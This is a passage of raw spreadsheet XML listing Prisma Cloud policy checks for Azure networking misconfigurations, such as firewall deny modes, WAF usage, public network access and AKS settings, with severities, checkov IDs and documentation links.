        <is>
          <t>IaC:Networking:azure-firewall</t>
        </is>
      </c>
      <c r="K1367" t="inlineStr">
        <is>
          <t>DenyIntelMode for Azure Firewalls is not set to Deny</t>
        </is>
      </c>
      <c r="L1367" t="inlineStr"/>
      <c r="M1367" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1367" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1367" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1367" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1367" t="inlineStr"/>
      <c r="R1367" t="inlineStr"/>
      <c r="S1367" t="inlineStr"/>
      <c r="T1367" t="b">
        <v>0</v>
      </c>
      <c r="U1367" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1367" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-firewall</t>
        </is>
      </c>
      <c r="W1367" t="inlineStr">
        <is>
          <t>Ensure DenyIntelMode is set to Deny for Azure Firewalls</t>
        </is>
      </c>
      <c r="X1367" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-216</t>
        </is>
      </c>
      <c r="Y1367" t="inlineStr"/>
      <c r="Z1367" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_firewall"]}</t>
        </is>
      </c>
      <c r="AA1367" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1367" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1367" t="inlineStr">
        <is>
          <t>CKV_AZURE_216</t>
        </is>
      </c>
      <c r="AD1367" t="b">
        <v>1</v>
      </c>
      <c r="AE1367" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1367" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>04bdfe76-d7ba-499b-8fb8-950128fe0882</t>
        </is>
      </c>
      <c r="AI1367" t="inlineStr"/>
      <c r="AJ1367" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1367" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" t="inlineStr"/>
      <c r="B1368" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1368" s="2" t="inlineStr"/>
      <c r="D1368" t="inlineStr"/>
      <c r="E1368" t="inlineStr"/>
      <c r="F1368" t="inlineStr"/>
      <c r="G1368" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1368" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-firewall</t>
        </is>
      </c>
      <c r="K1368" t="inlineStr">
        <is>
          <t>Azure Firewall does not define a firewall policy</t>
        </is>
      </c>
      <c r="L1368" t="inlineStr"/>
      <c r="M1368" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1368" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1368" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1368" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1368" t="inlineStr"/>
      <c r="R1368" t="inlineStr"/>
      <c r="S1368" t="inlineStr"/>
      <c r="T1368" t="b">
        <v>0</v>
      </c>
      <c r="U1368" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1368" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-firewall</t>
        </is>
      </c>
      <c r="W1368" t="inlineStr">
        <is>
          <t>Ensure Firewall defines a firewall policy</t>
        </is>
      </c>
      <c r="X1368" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-219</t>
        </is>
      </c>
      <c r="Y1368" t="inlineStr"/>
      <c r="Z1368" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_firewall"]}</t>
        </is>
      </c>
      <c r="AA1368" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1368" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1368" t="inlineStr">
        <is>
          <t>CKV_AZURE_219</t>
        </is>
      </c>
      <c r="AD1368" t="b">
        <v>1</v>
      </c>
      <c r="AE1368" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1368" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>51fbbaab-7f40-460f-8d0b-58f013138841</t>
        </is>
      </c>
      <c r="AI1368" t="inlineStr"/>
      <c r="AJ1368" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1368" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" t="inlineStr"/>
      <c r="B1369" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1369" s="2" t="inlineStr"/>
      <c r="D1369" t="inlineStr"/>
      <c r="E1369" t="inlineStr"/>
      <c r="F1369" t="inlineStr"/>
      <c r="G1369" t="b">
        <v>1</v>
      </c>
      <c r="H13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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1369" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-firewall</t>
        </is>
      </c>
      <c r="K1369" t="inlineStr">
        <is>
          <t>Firewall policy does not have IDPS mode set to deny</t>
        </is>
      </c>
      <c r="L1369" t="inlineStr"/>
      <c r="M1369" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1369" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1369" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1369" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1369" t="inlineStr"/>
      <c r="R1369" t="inlineStr"/>
      <c r="S1369" t="inlineStr"/>
      <c r="T1369" t="b">
        <v>0</v>
      </c>
      <c r="U1369" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1369" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-firewall-policy</t>
        </is>
      </c>
      <c r="W1369" t="inlineStr">
        <is>
          <t>Ensure Firewall policy has IDPS mode as deny</t>
        </is>
      </c>
      <c r="X1369" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-220</t>
        </is>
      </c>
      <c r="Y1369" t="inlineStr"/>
      <c r="Z1369" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA1369" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1369" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1369" t="inlineStr">
        <is>
          <t>CKV_AZURE_220</t>
        </is>
      </c>
      <c r="AD1369" t="b">
        <v>1</v>
      </c>
      <c r="AE1369" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1369" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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69" t="inlineStr">
        <is>
          <t>2d070655-6259-448f-b52a-2cf91a40f443</t>
        </is>
      </c>
      <c r="AI1369" t="inlineStr"/>
      <c r="AJ1369" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1369" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" t="inlineStr"/>
      <c r="B1370" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1370" s="2" t="inlineStr"/>
      <c r="D1370" t="inlineStr"/>
      <c r="E1370" t="inlineStr"/>
      <c r="F1370" t="inlineStr"/>
      <c r="G1370" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1370" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-frontdoor</t>
        </is>
      </c>
      <c r="K1370" t="inlineStr">
        <is>
          <t>Azure front door does not use WAF in Detection or Prevention modes</t>
        </is>
      </c>
      <c r="L1370" t="inlineStr"/>
      <c r="M1370" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1370" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1370" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1370" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1370" t="inlineStr"/>
      <c r="R1370" t="inlineStr"/>
      <c r="S1370" t="inlineStr"/>
      <c r="T1370" t="b">
        <v>0</v>
      </c>
      <c r="U1370" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1370" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-frontdoor-firewall-policy</t>
        </is>
      </c>
      <c r="W1370" t="inlineStr">
        <is>
          <t>Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes</t>
        </is>
      </c>
      <c r="X1370" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes</t>
        </is>
      </c>
      <c r="Y1370" t="inlineStr"/>
      <c r="Z1370" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_frontdoor_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA1370" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1370" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1370" t="inlineStr">
        <is>
          <t>CKV_AZURE_123</t>
        </is>
      </c>
      <c r="AD1370" t="b">
        <v>1</v>
      </c>
      <c r="AE1370" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1370" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>53b040ee-039c-49f2-82dd-d4187eacf5fd</t>
        </is>
      </c>
      <c r="AI1370" t="inlineStr"/>
      <c r="AJ1370" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1370" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" t="inlineStr"/>
      <c r="B1371" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1371" s="2" t="inlineStr"/>
      <c r="D1371" t="inlineStr"/>
      <c r="E1371" t="inlineStr"/>
      <c r="F1371" t="inlineStr"/>
      <c r="G1371" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1371" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-iothub</t>
        </is>
      </c>
      <c r="K1371" t="inlineStr">
        <is>
          <t>Azure IoT Hub enables public network access</t>
        </is>
      </c>
      <c r="L1371" t="inlineStr"/>
      <c r="M1371" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1371" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1371" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1371" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1371" t="inlineStr"/>
      <c r="R1371" t="inlineStr"/>
      <c r="S1371" t="inlineStr"/>
      <c r="T1371" t="b">
        <v>0</v>
      </c>
      <c r="U1371" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1371" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-iothub</t>
        </is>
      </c>
      <c r="W1371" t="inlineStr">
        <is>
          <t>Ensure that Azure IoT Hub disables public network access</t>
        </is>
      </c>
      <c r="X1371" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-iot-hub-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1371" t="inlineStr"/>
      <c r="Z1371" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_iothub"]}</t>
        </is>
      </c>
      <c r="AA1371" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1371" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1371" t="inlineStr">
        <is>
          <t>CKV_AZURE_108</t>
        </is>
      </c>
      <c r="AD1371" t="b">
        <v>1</v>
      </c>
      <c r="AE1371" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1371" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>53001655-cd04-47e1-93cc-406be8836f38</t>
        </is>
      </c>
      <c r="AI1371" t="inlineStr"/>
      <c r="AJ1371" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1371" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" t="inlineStr"/>
      <c r="B1372" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1372" s="2" t="inlineStr"/>
      <c r="D1372" t="inlineStr"/>
      <c r="E1372" t="inlineStr"/>
      <c r="F1372" t="inlineStr"/>
      <c r="G1372" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1372" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-key</t>
        </is>
      </c>
      <c r="K1372" t="inlineStr">
        <is>
          <t>Azure Key Vault Public Network Access Control</t>
        </is>
      </c>
      <c r="L1372" t="inlineStr"/>
      <c r="M1372" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1372" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1372" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1372" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1372" t="inlineStr"/>
      <c r="R1372" t="inlineStr"/>
      <c r="S1372" t="inlineStr"/>
      <c r="T1372" t="b">
        <v>0</v>
      </c>
      <c r="U1372" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1372" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-key-vault</t>
        </is>
      </c>
      <c r="W1372" t="inlineStr">
        <is>
          <t>Ensure that Azure Key Vault disables public network access</t>
        </is>
      </c>
      <c r="X1372" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-189</t>
        </is>
      </c>
      <c r="Y1372" t="inlineStr"/>
      <c r="Z1372" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA1372" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1372" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1372" t="inlineStr">
        <is>
          <t>CKV_AZURE_189</t>
        </is>
      </c>
      <c r="AD1372" t="b">
        <v>1</v>
      </c>
      <c r="AE1372" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1372" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>dee545a5-02b4-4b2d-92bc-4fc81e8caeb4</t>
        </is>
      </c>
      <c r="AI1372" t="inlineStr"/>
      <c r="AJ1372" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1372" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" t="inlineStr"/>
      <c r="B1373" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1373" s="2" t="inlineStr"/>
      <c r="D1373" t="inlineStr"/>
      <c r="E1373" t="inlineStr"/>
      <c r="F1373" t="inlineStr"/>
      <c r="G1373" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1373" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-key</t>
        </is>
      </c>
      <c r="K1373" t="inlineStr">
        <is>
          <t>Key vault does not allow firewall rules settings</t>
        </is>
      </c>
      <c r="L1373" t="inlineStr"/>
      <c r="M1373" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1373" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1373" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1373" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1373" t="inlineStr"/>
      <c r="R1373" t="inlineStr"/>
      <c r="S1373" t="inlineStr"/>
      <c r="T1373" t="b">
        <v>0</v>
      </c>
      <c r="U1373" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1373" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-key-vault</t>
        </is>
      </c>
      <c r="W1373" t="inlineStr">
        <is>
          <t>Ensure that key vault allows firewall rules settings</t>
        </is>
      </c>
      <c r="X1373" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-key-vault-allows-firewall-rules-settings</t>
        </is>
      </c>
      <c r="Y1373" t="inlineStr"/>
      <c r="Z1373" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA1373" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1373" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1373" t="inlineStr">
        <is>
          <t>CKV_AZURE_109</t>
        </is>
      </c>
      <c r="AD1373" t="b">
        <v>1</v>
      </c>
      <c r="AE1373" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1373" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>ba230f7b-fea0-405b-b022-bc0bded68577</t>
        </is>
      </c>
      <c r="AI1373" t="inlineStr"/>
      <c r="AJ1373" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1373" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" t="inlineStr"/>
      <c r="B1374" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1374" s="2" t="inlineStr"/>
      <c r="D1374" t="inlineStr"/>
      <c r="E1374" t="inlineStr"/>
      <c r="F1374" t="inlineStr"/>
      <c r="G1374" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1374" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1374" t="inlineStr">
        <is>
          <t>AKS Cluster Without Upgrade Channel</t>
        </is>
      </c>
      <c r="L1374" t="inlineStr"/>
      <c r="M1374" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1374" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1374" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1374" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1374" t="inlineStr"/>
      <c r="R1374" t="inlineStr"/>
      <c r="S1374" t="inlineStr"/>
      <c r="T1374" t="b">
        <v>0</v>
      </c>
      <c r="U1374" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1374" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1374" t="inlineStr">
        <is>
          <t>Ensure AKS cluster upgrade channel is chosen</t>
        </is>
      </c>
      <c r="X1374" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-171</t>
        </is>
      </c>
      <c r="Y1374" t="inlineStr"/>
      <c r="Z1374" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1374" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1374" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1374" t="inlineStr">
        <is>
          <t>CKV_AZURE_171</t>
        </is>
      </c>
      <c r="AD1374" t="b">
        <v>1</v>
      </c>
      <c r="AE1374" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1374" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>6f4b530b-d1e3-406d-8a46-339f417e0065</t>
        </is>
      </c>
      <c r="AI1374" t="inlineStr"/>
      <c r="AJ1374" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1374" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" t="inlineStr"/>
      <c r="B1375" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1375" s="2" t="inlineStr"/>
      <c r="D1375" t="inlineStr"/>
      <c r="E1375" t="inlineStr"/>
      <c r="F1375" t="inlineStr"/>
      <c r="G1375" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1375" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1375" t="inlineStr">
        <is>
          <t>Azure AKS cluster nodes have public IP addresses</t>
        </is>
      </c>
      <c r="L1375" t="inlineStr"/>
      <c r="M1375" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1375" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1375" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1375" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1375" t="inlineStr"/>
      <c r="R1375" t="inlineStr"/>
      <c r="S1375" t="inlineStr"/>
      <c r="T1375" t="b">
        <v>0</v>
      </c>
      <c r="U1375" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1375" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1375" t="inlineStr">
        <is>
          <t>Ensure AKS cluster nodes do not have public IP addresses</t>
        </is>
      </c>
      <c r="X1375" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-143</t>
        </is>
      </c>
      <c r="Y1375" t="inlineStr"/>
      <c r="Z1375" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1375" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1375" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1375" t="inlineStr">
        <is>
          <t>CKV_AZURE_143</t>
        </is>
      </c>
      <c r="AD1375" t="b">
        <v>1</v>
      </c>
      <c r="AE1375" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1375" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>fc72e718-8ead-474a-af29-11353df921f3</t>
        </is>
      </c>
      <c r="AI1375" t="inlineStr"/>
      <c r="AJ1375" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1375" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" t="inlineStr"/>
      <c r="B1376" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1376" s="2" t="inlineStr"/>
      <c r="D1376" t="inlineStr"/>
      <c r="E1376" t="inlineStr"/>
      <c r="F1376" t="inlineStr"/>
      <c r="G1376" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1376" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-machine</t>
        </is>
      </c>
      <c r="K1376" t="inlineStr">
        <is>
          <t>Azure Machine Learning Workspace is publicly accessible</t>
        </is>
      </c>
      <c r="L1376" t="inlineStr"/>
      <c r="M1376" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1376" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1376" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1376" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1376" t="inlineStr"/>
      <c r="R1376" t="inlineStr"/>
      <c r="S1376" t="inlineStr"/>
      <c r="T1376" t="b">
        <v>0</v>
      </c>
      <c r="U1376" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1376" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-machine-learning-workspace</t>
        </is>
      </c>
      <c r="W1376" t="inlineStr">
        <is>
          <t>Ensure that Public Access is disabled for Machine Learning Workspace</t>
        </is>
      </c>
      <c r="X1376" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible</t>
        </is>
      </c>
      <c r="Y1376" t="inlineStr"/>
      <c r="Z1376" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_machine_learning_workspace"]}</t>
        </is>
      </c>
      <c r="AA1376" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1376" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1376" t="inlineStr">
        <is>
          <t>CKV_AZURE_144</t>
        </is>
      </c>
      <c r="AD1376" t="b">
        <v>1</v>
      </c>
      <c r="AE1376" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1376" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>9aa11e2f-5491-4782-81f3-a8508bde6366</t>
        </is>
      </c>
      <c r="AI1376" t="inlineStr"/>
      <c r="AJ1376" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1376" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" t="inlineStr"/>
      <c r="B1377" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1377" s="2" t="inlineStr"/>
      <c r="D1377" t="inlineStr"/>
      <c r="E1377" t="inlineStr"/>
      <c r="F1377" t="inlineStr"/>
      <c r="G1377" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1377" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mariadb</t>
        </is>
      </c>
      <c r="K1377" t="inlineStr">
        <is>
          <t>Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0</t>
        </is>
      </c>
      <c r="L1377" t="inlineStr"/>
      <c r="M1377" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1377" t="inlineStr">
        <is>
